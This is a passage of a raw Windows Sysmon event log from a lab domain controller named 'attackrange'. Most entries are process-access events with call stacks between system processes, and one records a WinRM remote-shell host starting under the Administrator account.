C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.128{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E22-6005-CF16-110000000000}0x1116cf0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.935{59A5CD1D-8DF7-6005-2C02-00000000A201}41283480C:\Windows\servicing\TrustedInstaller.exe{59A5CD1D-8DF7-6005-2D02-00000000A201}4380C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA9-6005-0E00-00000000A201}10884600C:\Windows\system32\LogonUI.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-0E00-00000000A201}1088C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0900-00000000A201}804C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.888{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0900-00000000A201}804C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 